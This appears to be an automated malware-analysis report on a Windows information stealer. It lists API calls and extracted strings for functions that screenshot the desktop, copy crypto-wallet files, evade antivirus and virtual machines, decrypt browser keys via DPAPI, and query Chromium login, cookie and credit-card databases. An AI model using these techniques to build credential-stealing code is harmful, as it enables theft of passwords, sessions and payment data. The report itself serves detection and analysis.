Opcode ID: d5dabf3599c25a851c97f5e97ac13da5a3a57d94270a35983a1f79571dd279ba
Instruction ID: dc841ca804e9a693a0b6d71a096e4dd1340138430f75d124f3149e175b8e8541
Opcode Fuzzy Hash: d5dabf3599c25a851c97f5e97ac13da5a3a57d94270a35983a1f79571dd279ba
Instruction Fuzzy Hash: D5B19971D40319ABDB10DFA1DC06FEE77B8BF05704F14016AF608B7192EB78AA848B59

Uniqueness

Uniqueness Score: -1.00%

Function 00414000, Relevance: 47.5, APIs: 23, Strings: 4, Instructions: 291windowmemoryfileCOMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208,75144770,7519F790), ref: 00414081
GetDesktopWindow.USER32(?,?,00000000), ref: 00414144
GetWindowRect.USER32 ref: 00414157
GetWindowDC.USER32(00000000), ref: 0041415E
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0041417E
CreateCompatibleDC.GDI32(00000000), ref: 00414187
CreateDIBSection.GDI32(?,?,00000001,?,00000000,00000000), ref: 004141F3
DeleteDC.GDI32(00000000), ref: 00414207
DeleteDC.GDI32(?), ref: 0041420C
GdiplusShutdown.GDIPLUS(?), ref: 00414211
SaveDC.GDI32(00000000), ref: 00414218
SelectObject.GDI32(00000000,?), ref: 00414224
BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 00414241
RestoreDC.GDI32(00000000,00000000), ref: 00414249
DeleteDC.GDI32(00000000), ref: 00414256
DeleteDC.GDI32(?), ref: 0041425B
GdipAlloc.GDIPLUS(00000010), ref: 0041425F
GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 00414284
GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 004142E7
GdipGetImageEncoders.GDIPLUS(00000000,00000000,00000000), ref: 0041430D
GdipSaveImageToFile.GDIPLUS(?,?,?,00000001), ref: 00414386
DeleteObject.GDI32(?), ref: 0041439E
GdiplusShutdown.GDIPLUS(?), ref: 004143A7

Strings

image/jpeg, xrefs: 00414322
%Temp%\, xrefs: 00414039
p@, xrefs: 00414271
\_Files\_Screen_Desktop.jpeg, xrefs: 00414050

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: DeleteGdip$CreateImageWindow$EncodersGdiplusObjectSaveShutdown$AllocBitmapCapsCompatibleDesktopDeviceEnvironmentExpandFileFromRectRestoreSectionSelectSizeStrings
String ID: %Temp%\$\_Files\_Screen_Desktop.jpeg$image/jpeg$p@
API String ID: 4131596515-1344473534
Opcode ID: c23021b7c5e363fb85e1864324eaa9c63b98eeba38e88e4b63129c5e707c4dc4
Instruction ID: fad788a9aff77e169cd142623c91e6fbe34f424d00826dd6bd1321a6f48b1357
Opcode Fuzzy Hash: c23021b7c5e363fb85e1864324eaa9c63b98eeba38e88e4b63129c5e707c4dc4
Instruction Fuzzy Hash: F0B18A75D002099BDB10CFA4DC49FEEBBB5FF49700F10416AE905A72A1D7799A80CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 00416C3A, Relevance: 37.4, APIs: 7, Strings: 14, Instructions: 610fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNEL32(00000000,00000000,00000000,?,?,?,?), ref: 00416D98
ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?), ref: 00416F7E
FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00417111
FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 00417120
FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 00417158
FindNextFileW.KERNEL32(?,00000010,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004173EB
FindClose.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004173FD

Strings

Qh@L, xrefs: 00417035
/?, xrefs: 00416D7C
%Temp%\, xrefs: 00416F43
%wS, xrefs: 00417077
P(1, xrefs: 00416CBC
%wS, xrefs: 0041704B
\files_\cryptocurrency\log.txt, xrefs: 00416F53
%wS_, xrefs: 00417036
PhXL, xrefs: 00417076
a+,ccs=UTF-16LE, xrefs: 00417012
F, xrefs: 00416CB4
PhLL, xrefs: 0041704A
*.*, xrefs: 00417132
PE<, xrefs: 00417065

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Find$File$CloseNext$CopyEnvironmentExpandFirstStrings
String ID: %Temp%\$%wS$%wS$%wS_$*.*$PhLL$PhXL$P(1$PE<$Qh@L$\files_\cryptocurrency\log.txt$a+,ccs=UTF-16LE$/?$F
API String ID: 82615921-3125302018
Opcode ID: 8d13f3343285a6d2fbb3eabac6bbcbe9499286c900654026e196f020d0e9511c
Instruction ID: ec606bf1ba29cc79844b4950874c622ffea69e696044bcc9dbd71712572feeab
Opcode Fuzzy Hash: 8d13f3343285a6d2fbb3eabac6bbcbe9499286c900654026e196f020d0e9511c
Instruction Fuzzy Hash: 8D323771E001089BDF04DB68DD89BDEBB76AF41308F24815EE405A7391E73DAB85CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0041A280, Relevance: 35.3, APIs: 13, Strings: 7, Instructions: 300registrysleepCOMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsW.KERNEL32(%ProgramData%\AVG,?,00000208,75146490,00000000), ref: 0041A2B8
GetFileAttributesW.KERNEL32(00000000), ref: 0041A2D7
Sleep.KERNEL32 ref: 0041A319
ExpandEnvironmentStringsW.KERNEL32(%ProgramData%\AVAST Software,00000208,00000208), ref: 0041A32C
GetFileAttributesW.KERNEL32(00000000), ref: 0041A33F
Sleep.KERNEL32 ref: 0041A381
GetSystemInfo.KERNEL32(?), ref: 0041A38A
KiUserCallbackDispatcher.NTDLL(00000000), ref: 0041A39F
GlobalMemoryStatusEx.KERNEL32(?), ref: 0041A3C4
RegOpenKeyExW.KERNEL32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000000,00020119,?), ref: 0041A425
RegQueryValueExW.KERNEL32(?,ProcessorNameString,00000000,00000000,?,000000FF), ref: 0041A446
RegCloseKey.KERNEL32(?), ref: 0041A44F
ExitProcess.KERNEL32 ref: 0041A625

Strings

%ProgramData%\AVAST Software, xrefs: 0041A327
HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 0041A41B
@, xrefs: 0041A3B9
0Tu, xrefs: 0041A446
%ProgramData%\AVG, xrefs: 0041A2B3
Xeon, xrefs: 0041A528
ProcessorNameString, xrefs: 0041A43E

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AttributesEnvironmentExpandFileSleepStrings$CallbackCloseDispatcherExitGlobalInfoMemoryOpenProcessQueryStatusSystemUserValue
String ID: %ProgramData%\AVAST Software$%ProgramData%\AVG$0Tu$@$HARDWARE\DESCRIPTION\System\CentralProcessor\0$ProcessorNameString$Xeon
API String ID: 3766067388-1087040355
Opcode ID: 5ddbd42f8d1db3f8252066d75860e36910a0476bd02d089f7060997e1cdc62bc
Instruction ID: 8d586a95ac74913797bec42dc34ab3ace85a6178e6feb955604f9c41f7407c32
Opcode Fuzzy Hash: 5ddbd42f8d1db3f8252066d75860e36910a0476bd02d089f7060997e1cdc62bc
Instruction Fuzzy Hash: 56A12771D01248ABEB10DB64CC89FEEB776EF01314F18026AE444A72D1DB7C99D9CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 004A12A9, Relevance: 34.0, APIs: 10, Strings: 9, Instructions: 725fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004A13CB
CloseHandle.KERNEL32(00000000), ref: 004A13FC

Strings

.zip, xrefs: 004A12DF
.gz, xrefs: 004A1339
K, xrefs: 004A1A22
.lzh, xrefs: 004A1315
.tgz, xrefs: 004A134B
UT, xrefs: 004A155A
.arj, xrefs: 004A1327
.zoo, xrefs: 004A12F1
.arc, xrefs: 004A1303

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseCreateFileHandle
String ID: .arc$.arj$.gz$.lzh$.tgz$.zip$.zoo$K$UT
API String ID: 3498533004-383760961
Opcode ID: 2570978915106cad49fa70ff97a87b2f86537684dd5cf0214a8a7237f00cd851
Instruction ID: 1449aa846ae6d03d492850e2761f467044c4a265ff49e6d705f34ff494084b6e
Opcode Fuzzy Hash: 2570978915106cad49fa70ff97a87b2f86537684dd5cf0214a8a7237f00cd851
Instruction Fuzzy Hash: 1652A1716043408FDB14CF25D880B6BBBE4AFA6304F04096EED85DB392D779D949CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0041469B, Relevance: 30.4, APIs: 9, Strings: 8, Instructions: 695fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000001), ref: 004146EB
ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208), ref: 004147AC
CopyFileW.KERNEL32(00000000,00000000,00000000), ref: 0041492B
ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208), ref: 00414B11
FindNextFileW.KERNEL32(?,?), ref: 00414CA4
FindClose.KERNEL32(?), ref: 00414CB3
FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 00414CEB
FindNextFileW.KERNEL32(?,00000010), ref: 00414F7B
FindClose.KERNEL32(?), ref: 00414F8D

Strings

\_Files\_Wallet\_log.txt, xrefs: 00414AE6
a+,ccs=UTF-16LE, xrefs: 00414BA5
\_Files\_Wallet\, xrefs: 00414781
%Temp%\, xrefs: 0041476C, 00414AD6
%wS, xrefs: 00414C0A
*.*, xrefs: 00414CC5
%wS, xrefs: 00414BDE
%wS_, xrefs: 00414BC9

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Find$File$CloseEnvironmentExpandFirstNextStrings$Copy
String ID: %Temp%\$%wS$%wS$%wS_$*.*$\_Files\_Wallet\$\_Files\_Wallet\_log.txt$a+,ccs=UTF-16LE
API String ID: 697253463-2743960718
Opcode ID: cb1b0c648c5b2e75469801c114e6edf34b7d80f11f0c564ddb6c479e16638c58
Instruction ID: 5bb19c8c34d4d2ffaf44b0c3ab8203b27d11e9d250ce2a6751e8ec1b5692e4e5
Opcode Fuzzy Hash: cb1b0c648c5b2e75469801c114e6edf34b7d80f11f0c564ddb6c479e16638c58
Instruction Fuzzy Hash: F7422671E001089BDF04DB68DD89BDE7776BF82308F24815EE405A7391E73DAA85CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00401270, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 167fileencryptionCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32 ref: 00401280

Part of subcall function 0049DE60: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,7519F9C0,?,?,?,0040A1A8), ref: 0049DE76
Part of subcall function 0049DE60: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,0040A1A8), ref: 0049DE8A

CryptUnprotectData.CRYPT32(?), ref: 004013C0
LocalFree.KERNEL32(?), ref: 004013F6
UnmapViewOfFile.KERNEL32(?), ref: 00401433
FindCloseChangeNotification.KERNEL32(?), ref: 0040144C
CloseHandle.KERNEL32(?), ref: 00401457

Strings

os_crypt, xrefs: 004012FE
encrypted_key, xrefs: 0040132A
DPAPI, xrefs: 00401382

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$Close$AttributesChangeCreateCryptDataFindFreeHandleLocalNotificationSizeUnmapUnprotectView
String ID: DPAPI$encrypted_key$os_crypt
API String ID: 3400237080-3106839558
Opcode ID: 5c4c2819aee787ab5089974be96750d38c90fbe20f6a97afbb09bb6ec0370f75
Instruction ID: 469b9ef74598b2b4a6e9991f949eec5a2ce8887bfa1ebbfee24a118d7c1d8155
Opcode Fuzzy Hash: 5c4c2819aee787ab5089974be96750d38c90fbe20f6a97afbb09bb6ec0370f75
Instruction Fuzzy Hash: B051F370A043019BDB20DF219845F6B77A8EF81314F48853FF885A72F2D778D949879A

Uniqueness

Uniqueness Score: -1.00%

Function 004B465F, Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 373timeCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 004B46E1
_free.LIBCMT ref: 004B4705
_free.LIBCMT ref: 004B4892
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,004C40BC), ref: 004B48A4
_free.LIBCMT ref: 004B4A5E

Strings

Pacific Daylight Time, xrefs: 004B4942
Pacific Standard Time, xrefs: 004B4913

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _free$InformationTimeZone
String ID: Pacific Daylight Time$Pacific Standard Time
API String ID: 597776487-1154798116
Opcode ID: 84e7caaedd88e807999b26a6c2837062f4c24a3abe59178b1b93f3e9ee4dc6b6
Instruction ID: 1eb5f2ed2c660caaa139e314d9f18cd8ce6cec8fd59461b3c0a2443b41060f7d
Opcode Fuzzy Hash: 84e7caaedd88e807999b26a6c2837062f4c24a3abe59178b1b93f3e9ee4dc6b6
Instruction Fuzzy Hash: 9AC12A75900244ABDB24AF799C51AEB7BA9EFC6354F1401AFE48497383E7389E01C778

Uniqueness

Uniqueness Score: -1.00%

Function 004B94A5, Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1451COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 004B9620

Strings

1#QNAN, xrefs: 004BA7BE
1#SNAN, xrefs: 004BA7B7
1#IND, xrefs: 004BA7B0
1#INF, xrefs: 004BA7DB

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 5da6df2de7a60bcd954c97adb186e6d09c32884df3644b729a1083fc2d1da1e0
Instruction ID: 1a3f45ca697513c97336abe2bfce30dc47974c165874a3fe19e00e00dbac2e81
Opcode Fuzzy Hash: 5da6df2de7a60bcd954c97adb186e6d09c32884df3644b729a1083fc2d1da1e0
Instruction Fuzzy Hash: 05C25A71E082288FDB24CE28DD807EAB7B5EB49314F1441EBD94DE7240E778AE918F55

Uniqueness

Uniqueness Score: -1.00%

Function 004A0BF0, Relevance: 9.1, APIs: 6, Instructions: 127timeCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 004A0C56
SetFilePointer.KERNELBASE(?,00000000,00000000,00000000), ref: 004A0C7F
GetLocalTime.KERNEL32(?), ref: 004A0CAA
SystemTimeToFileTime.KERNEL32(?,?), ref: 004A0CBA
FileTimeToSystemTime.KERNEL32(?,?), ref: 004A0CDA
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004A0CFC

Part of subcall function 004A0820: GetFileInformationByHandle.KERNEL32(?,?), ref: 004A0833

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileTime$PointerSystem$HandleInformationLocalUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 582742055-0
Opcode ID: 7a4ae3abc6cfd1578aa7f0bded898e42e1d09e2077408afde73a55e151ae7310
Instruction ID: 7ffcf8907015c9c820c9f1329ba7f7b3ee2bdf2412a37980ba99c6dd899a6f46
Opcode Fuzzy Hash: 7a4ae3abc6cfd1578aa7f0bded898e42e1d09e2077408afde73a55e151ae7310
Instruction Fuzzy Hash: 31416DB2500B409FD324CF29C845B6BBBE4FB89314F044A2EF5A6C6790E779E509CB55

Uniqueness

Uniqueness Score: -1.00%

Function 00416AC0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 120COMMON

Download Yara Rule

Strings

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00416946, 00416ADF
*.*, xrefs: 00417132

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: *.*$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
API String ID: 0-1654220321
Opcode ID: 272733627f271d02c33a442a3058d9f99fcb412911a12305c935aa7b05e2c060
Instruction ID: 10bd9fedf635848a99a5130cb0e958116b329a0d7050b81a2b2a453b29e018d5
Opcode Fuzzy Hash: 272733627f271d02c33a442a3058d9f99fcb412911a12305c935aa7b05e2c060
Instruction Fuzzy Hash: E841D371A00218DFDB14DF68C984BCEBBB5FF45314F20825EE418A7391E738AA85CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0040F1D0, Relevance: 4.7, APIs: 3, Instructions: 194COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2644a83fb29fd233cee74b9ef661fe757a18dae4f0cb1b5d70e100e6882d63f4
Instruction ID: f25035ee1cb881acb3313cabd8cb4b4ea0b3bd0544d8b26f6b0b77aca57c8182
Opcode Fuzzy Hash: 2644a83fb29fd233cee74b9ef661fe757a18dae4f0cb1b5d70e100e6882d63f4
Instruction Fuzzy Hash: 6261F670900204DFCB10DF68C985B9EBBB4FF45314F24827ED805A7785E779AA49CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004A0AA0, Relevance: 1.6, APIs: 1, Instructions: 122fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(FFFFFFFF,?,00000001,?,00000000,FFFFFFFF,?,00000000,004A0576), ref: 004A0BC8

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 4c5a436bdb1c6bd37d6a120fff0ff039b3aff5452b55fa98c465ca1db4123db2
Instruction ID: 5605505f8558b2c107b1cf4daa93001e14d8a8fc3e342900a21fbef9ef82b18c
Opcode Fuzzy Hash: 4c5a436bdb1c6bd37d6a120fff0ff039b3aff5452b55fa98c465ca1db4123db2
Instruction Fuzzy Hash: D241AE71611B058BD364DF6ADA84A27F7E9FBE6310B44892FE486C3A40D778F409CB64

Uniqueness

Uniqueness Score: -1.00%

Function 004A7E56, Relevance: 1.5, Strings: 1, Instructions: 239COMMON

Download Yara Rule

Strings

0, xrefs: 004A7FEE

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 891df67f1d03891f94bdf676d7d4120b314852647c375e5087ed69af3ef2c7f1
Instruction ID: 4db9edbc4d03fd52ef0553b58a15dcf2439f5f6272f167a05e87f56c35d7cee9
Opcode Fuzzy Hash: 891df67f1d03891f94bdf676d7d4120b314852647c375e5087ed69af3ef2c7f1
Instruction Fuzzy Hash: 0A6169707082059EDB389A288C91A7FB395EBB3304F54442FF542DB381DB6D9E46839E

Uniqueness

Uniqueness Score: -1.00%

Function 004A79F2, Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

0, xrefs: 004A7B6E

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 7e0db3828ccef8794f10ab379692a40b61427a3876ac7fe46bae9c0bc110dd44
Instruction ID: a7a4a3720969d8f96806a27dffb1dc3574845a13eaf7c4d28fcabf7d0a4f5332
Opcode Fuzzy Hash: 7e0db3828ccef8794f10ab379692a40b61427a3876ac7fe46bae9c0bc110dd44
Instruction Fuzzy Hash: A75149B060C64476DB388A288C957FF77999B33308F14445FE582D7382DA2DAF46836E

Uniqueness

Uniqueness Score: -1.00%

Function 004016AA, Relevance: 108.0, APIs: 8, Strings: 53, Instructions: 1221COMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208), ref: 004016BF
ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208), ref: 00401793
ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208), ref: 00401B5F
ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208), ref: 00401C33
ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208), ref: 00401D13
ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208), ref: 00401DE7

Strings

Soft: Opera New, xrefs: 004019C4
Soft: CCleaner Browser New, xrefs: 00401A09
Browser: Vivaldi [new], xrefs: 004019A2
[|, xrefs: 00402E70
Url: %s, xrefs: 00401A1A
Password: %s, xrefs: 00401A3C, 00401A78
MM/YY: %d/, xrefs: 004031F7, 0040325D
%d, xrefs: 00403209, 0040326C
FALSE, xrefs: 00402C04, 00402CA6, 00402D48, 00402DEA
Soft: Brave New, xrefs: 00401996
Number: %s, xrefs: 004031E6, 0040324C
\files_\cookies\google_chrome_new.txt, xrefs: 00401DB9
%Temp%\, xrefs: 00401755, 00401B1B, 00401BF5, 00401CD5, 00401DA9, 00402ECB, 00402FA5
Soft: Avast Secure Browser, xrefs: 004019F2
Soft: Google Chrome New Profile 1, xrefs: 00401948
Browser: Chromium [new], xrefs: 004019D0
Soft: Google Chrome New Profile 3, xrefs: 0040197C
P#l, xrefs: 00402D00
Site: %s, xrefs: 00401A56
WW., xrefs: 00402D8E
\files_\passwords.txt, xrefs: 00401765
Browser: Google Chrome [new] Profile 1, xrefs: 0040193D
1630345132, xrefs: 00402CB9, 00402DFD
Browser: CCleaner Browser [new], xrefs: 004019FE
\files_\cookies.txt, xrefs: 00401C05
1830365600, xrefs: 00402C17, 00402D5B
SELECT host_key, path, name, encrypted_value FROM cookies, xrefs: 00402AF4
SELECT origin_url, username_value, password_value FROM logins, xrefs: 0040183C
Browser: Google Chrome [new], xrefs: 00401923
Soft: Chromium New, xrefs: 004019DB
%s, xrefs: 00402BE5, 00402BF6, 00402C09, 00402C1C, 00402C2D, 00402C87, 00402C98, 00402CAB, 00402CBE, 00402CCF, 00402D29, 00402D3A, 00402D4D, 00402D60, 00402D71, 00402DCB, 00402DDC, 00402DEF, 00402E02, 00402E13
}l, xrefs: 00402E95
%s, xrefs: 00402C3C, 00402CDE, 00402D80, 00402E22
t)SWVp*, xrefs: 00402B86
Browser: Opera [new], xrefs: 004019B9
Pgm, xrefs: 00402BBC
Name: %s, xrefs: 0040321A, 0040327D
\_Files\_All_CC_list.txt, xrefs: 00402EDB
Browser: Google Chrome [new] Profile 3, xrefs: 00401971
Browser: Avast Secure Browser, xrefs: 004019E7
Soft: Google Chrome New Profile 2, xrefs: 00401962
Soft: Vivaldi New, xrefs: 004019AD
Browser: Brave [new], xrefs: 0040198B
xl, xrefs: 00402E9A
\files_\cc.txt, xrefs: 00402FB5
\_Files\_Cookies\google_chrome_new.txt, xrefs: 00401CE5
Browser: Google Chrome [new] Profile 2, xrefs: 00401957
Username: %s, xrefs: 00401A2B, 00401A67
\_Files\_AllCookies_list.txt, xrefs: 00401B2B
o, xrefs: 00402B7A
Soft: Google Chrome New, xrefs: 0040192E
SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards, xrefs: 0040308C
TRUE, xrefs: 00402BE0, 00402C82, 00402D24, 00402DC6

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: EnvironmentExpandStrings
String ID: %s$%s$%Temp%\$%d$1630345132$1830365600$Browser: Avast Secure Browser$Browser: Brave [new]$Browser: CCleaner Browser [new]$Browser: Chromium [new]$Browser: Google Chrome [new]$Browser: Google Chrome [new] Profile 1$Browser: Google Chrome [new] Profile 2$Browser: Google Chrome [new] Profile 3$Browser: Opera [new]$Browser: Vivaldi [new]$FALSE$MM/YY: %d/$Name: %s$Number: %s$Password: %s$P#l$Pgm$SELECT host_key, path, name, encrypted_value FROM cookies$SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards$SELECT origin_url, username_value, password_value FROM logins$Site: %s$Soft: Avast Secure Browser$Soft: Brave New$Soft: CCleaner Browser New$Soft: Chromium New$Soft: Google Chrome New$Soft: Google Chrome New Profile 1$Soft: Google Chrome New Profile 2$Soft: Google Chrome New Profile 3$Soft: Opera New$Soft: Vivaldi New$TRUE$Url: %s$Username: %s$WW.$\_Files\_AllCookies_list.txt$\_Files\_All_CC_list.txt$\_Files\_Cookies\google_chrome_new.txt$\files_\cc.txt$\files_\cookies.txt$\files_\cookies\google_chrome_new.txt$\files_\passwords.txt$t)SWVp*$[|$xl$}l$o
API String ID: 237503144-3930038513
Opcode ID: 25a0bc749d191858c54498018581de598bd9b88df4160e943c0337edde77600a
Instruction ID: 70dc95acb03ea4acd0b3fe3f32f60a34ec86a50b8cab892b21c3e91955d7ef0b
Opcode Fuzzy Hash: 25a0bc749d191858c54498018581de598bd9b88df4160e943c0337edde77600a
Instruction Fuzzy Hash: 9E824575E002046BDB05AB64DD86FAF7636AF59308F20413FF400772E2E67DAA118B9D

Uniqueness

Uniqueness Score: -1.00%

Function 0040214C, Relevance: 48.0, APIs: 2, Strings: 25, Instructions: 731COMMON

Download Yara Rule

Strings

[|, xrefs: 00402E70
%s, xrefs: 00402BE5, 00402BF6, 00402C09, 00402C1C, 00402C2D, 00402C87, 00402C98, 00402CAB, 00402CBE, 00402CCF, 00402D29, 00402D3A, 00402D4D, 00402D60, 00402D71, 00402DCB, 00402DDC, 00402DEF, 00402E02, 00402E13
}l, xrefs: 00402E95
%s, xrefs: 00402C3C, 00402CDE, 00402D80, 00402E22
MM/YY: %d/, xrefs: 004031F7, 0040325D
%d, xrefs: 00403209, 0040326C
FALSE, xrefs: 00402C04, 00402CA6, 00402D48, 00402DEA
t)SWVp*, xrefs: 00402B86
Pgm, xrefs: 00402BBC
Name: %s, xrefs: 0040321A, 0040327D
Number: %s, xrefs: 004031E6, 0040324C
\_Files\_Cookies\google_chrome_new_profile_3.txt, xrefs: 00402157
\_Files\_All_CC_list.txt, xrefs: 00402EDB
%Temp%\, xrefs: 0040221B, 00402ECB, 00402FA5
P#l, xrefs: 00402D00
xl, xrefs: 00402E9A
WW., xrefs: 00402D8E
\files_\cc.txt, xrefs: 00402FB5
1630345132, xrefs: 00402CB9, 00402DFD
\files_\cookies\google_chrome_new_profile_3.txt, xrefs: 0040222B
o, xrefs: 00402B7A
1830365600, xrefs: 00402C17, 00402D5B
SELECT host_key, path, name, encrypted_value FROM cookies, xrefs: 00402AF4
SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards, xrefs: 0040308C
TRUE, xrefs: 00402BE0, 00402C82, 00402D24, 00402DC6

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: %s$%s$%Temp%\$%d$1630345132$1830365600$FALSE$MM/YY: %d/$Name: %s$Number: %s$P#l$Pgm$SELECT host_key, path, name, encrypted_value FROM cookies$SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards$TRUE$WW.$\_Files\_All_CC_list.txt$\_Files\_Cookies\google_chrome_new_profile_3.txt$\files_\cc.txt$\files_\cookies\google_chrome_new_profile_3.txt$t)SWVp*$[|$xl$}l$o
API String ID: 0-2932997205
Opcode ID: 4e017ad4fcf6566ad9fdb82110f1a16233c1f2bfc7a5e7da841d115ef107de92
Instruction ID: fcd5011e6c5dcbb27e2e09c4b84ce001a62c65986f29edba671bb629c5504d5f
Opcode Fuzzy Hash: 4e017ad4fcf6566ad9fdb82110f1a16233c1f2bfc7a5e7da841d115ef107de92
Instruction Fuzzy Hash: 453266B5E0020467DB01AB60ED46FAF7636AF5930CF14413FF804762E2E67D9A118B9E

Uniqueness

Uniqueness Score: -1.00%

Function 004022AB, Relevance: 48.0, APIs: 2, Strings: 25, Instructions: 731COMMON

Download Yara Rule

Strings

\files_\cookies\brave_new.txt, xrefs: 0040238A
[|, xrefs: 00402E70
%s, xrefs: 00402BE5, 00402BF6, 00402C09, 00402C1C, 00402C2D, 00402C87, 00402C98, 00402CAB, 00402CBE, 00402CCF, 00402D29, 00402D3A, 00402D4D, 00402D60, 00402D71, 00402DCB, 00402DDC, 00402DEF, 00402E02, 00402E13
}l, xrefs: 00402E95
\_Files\_Cookies\brave_new.txt, xrefs: 004022B6
%s, xrefs: 00402C3C, 00402CDE, 00402D80, 00402E22
MM/YY: %d/, xrefs: 004031F7, 0040325D
%d, xrefs: 00403209, 0040326C
FALSE, xrefs: 00402C04, 00402CA6, 00402D48, 00402DEA
t)SWVp*, xrefs: 00402B86
Pgm, xrefs: 00402BBC
Name: %s, xrefs: 0040321A, 0040327D
Number: %s, xrefs: 004031E6, 0040324C
\_Files\_All_CC_list.txt, xrefs: 00402EDB
%Temp%\, xrefs: 0040237A, 00402ECB, 00402FA5
P#l, xrefs: 00402D00
xl, xrefs: 00402E9A
WW., xrefs: 00402D8E
\files_\cc.txt, xrefs: 00402FB5
